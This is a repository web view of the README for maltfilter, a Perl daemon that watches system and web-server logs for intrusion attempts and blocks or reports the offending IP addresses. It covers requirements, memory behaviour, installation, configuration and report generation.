Mercurial > hg > maltfilter
view README @ 97:3dbd9d392986
Change XSS style attack DroneBL class to 6. Still not exactly what we want, though.
author | Matti Hamalainen <ccr@tnsp.org> |
---|---|
date | Mon, 31 Aug 2009 11:57:46 +0300 |
parents | b1f9df8bb084 |
children | 53a076bc75db |
line wrap: on
line source
Malicious Attack Livid Termination Filter daemon (maltfilter) v0.19.3 ===================================================================== Programmed by Matti 'ccr' Hämäläinen <ccr@tnsp.org> (C) Copyright 2009 Tecnic Software productions (TNSP) Distributed under the modified ("3-clause") BSD license. Please see included file COPYING for more information. About ===== Maltfilter is daemon script written in Perl, which continuously scans various system logfiles including auth.log, Apache style common logformat and error logs, etc. for signs of malicious connections, break-in (login bruteforcing, etc.) and exploitation attempts. The originating IP addresses of these connections can be then acted upon in following ways, each being optional: * Insertion (and eventual deletion or "weeding") of Netfilter rules. * Submitting entry to DroneBL DNSBL service. * Gather "evidence" about certain PHP XSS exploit attempts into specified directory. These evidence files include the attempted exploit code (if found) and hosts which have tried to make your server run it. Additionally Maltfilter can generate status reports (either continuously in daemon mode, or in run-once report mode), in plaintext and HTML formats. Requirements: - Perl 5.8 or later - Date::Parse (libtimedate-perl) - Net::IP (libnet-ip-perl) - Net::DNS (libnet-dns-perl) - LWP::UserAgent (libwww-perl) Memory requirement considerations ================================= Because Maltfilter is written in Perl, it (or rather the Perl interpreter it is running under) tends not to free any allocated memory. This is NOT a memory leak per se, but a feature of Perl's memory allocator. Currently allocated memory is simply reused for other structures when needed, thus making the VIRT consumption periodically rise. However, there may be some situations (none that I have experienced myself as of yet, but as usual anything is possible) where Maltfilter's memory consumption rises to unbearable level. In high-volume servers it may be useful to periodically restart (as in complete restart, not reload via HUP) the daemon to free the memory. It is also helpful to change the FILTER_MAX_AGE and GLOBAL_MAX_AGE configuration settings to smaller values, so that amount of data held in memory at once is smaller. Installation ============ Copy maltfilter script to /usr/sbin and set permissions $ cp maltfilter /usr/sbin/maltfilter $ chmod 755 /usr/sbin/maltfilter $ chown root:root /usr/sbin/maltfilter Copy example configuration under /etc (you may not want to to have the configuration readable to regular users, so below example sets mode 600 to it.) $ cp example.conf /etc/maltfilter.conf $ chmod 600 /etc/maltfilter.conf $ chown root:root /etc/maltfilter.conf Optional ======== Additionally you can set up the provided Debian style init script: $ cp example.init /etc/init.d/maltfilter $ chmod 755 /etc/init.d/maltfilter $ chown root:root /etc/init.d/maltfilter You need to edit the script, if you didn't install the configuration and maltfilter to paths described in installation section. Also a simple example HTML CSS stylesheet is provided for your convenience. Configuration and usage ======================= See example.conf for documentation about settings. Start maltfilter either via the init script or through commandline: $ maltfilter /var/run/maltfilter.pid /etc/maltfilter.conf If you want to use the init script, you need to edit your init runlevel settings to enable it, for example in Debian/Ubuntu you can use rcconf(8) or chkconfig(8). Reports ======= Automatic report generation can be enabled from configuration. You can also run "full" report generation via the "-f" option, in this special mode, no automatic weeding is performed, resulting in more data being shown.